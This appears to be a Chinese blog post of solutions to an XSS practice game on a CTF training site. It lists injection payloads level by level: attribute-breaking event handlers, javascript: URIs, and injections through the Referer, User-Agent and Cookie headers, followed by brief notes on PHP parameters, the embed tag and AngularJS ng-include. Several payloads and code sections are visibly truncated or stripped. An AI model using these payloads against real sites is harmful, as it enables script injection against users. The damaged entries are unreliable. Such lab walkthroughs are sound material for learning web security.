xss小游戏通关-全答案

xss

url:http://test.ctf8.com/level1.php?name=test

小游戏payload:

  2. ">
  3. ' onclick=alert("'test'") '
  4. " onclick=alert("'test'") "
  5. ">test
  6. ">
  7. ">alert("'test'")
  8. javascript:alert(1)
  9. javascript:alert(1)/* http://test*/
  10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
  11. Referer: test" onclick=alert("'test'") type="text
  12. User-Agent:test" onclick=alert("'test'") type="text
  13. Cookie: user=test" onclick=alert("'test'") type="text
  14. 据说是一个图片中的exif信息,但是网址已失效;
  15. level15.php?src='level1.php?name='
  16. level16.php?keyword=
  17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
  18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
  19. flash xss
  20. flash xss

有些参数可能会隐藏哦:

源码:get.php

<?php 
echo "
php变量提交get参数:
";
$str = $_GET["name"];
$str2 = $_GET["sex"];
echo "
form表单提交get参数
".'





姓名:


input通过php接收姓名参数:


直接接收php性别参数





';
?>
  1. url中能看到的参数:?name=xiaoming&form=&form2=
  2. 没有在URL中显示参数:&sex=
  3. DOM不经过服务器的
  • 能显示在url中的参数中的是form表单中name属性定义的参数;php定义的需要手动添加,或者链接到form表单上;

在线编码网站:http://monyer.com/demo/monyerjs/

标签

embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

支持事件属性;

弹窗方式:

AngularJS中的ng-include

  1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
  2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
  3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
  4. 组件

fath.html内容:

son.html内容:

Hello world

数据一次完整的编码解码过程:

技术随笔

相关

标签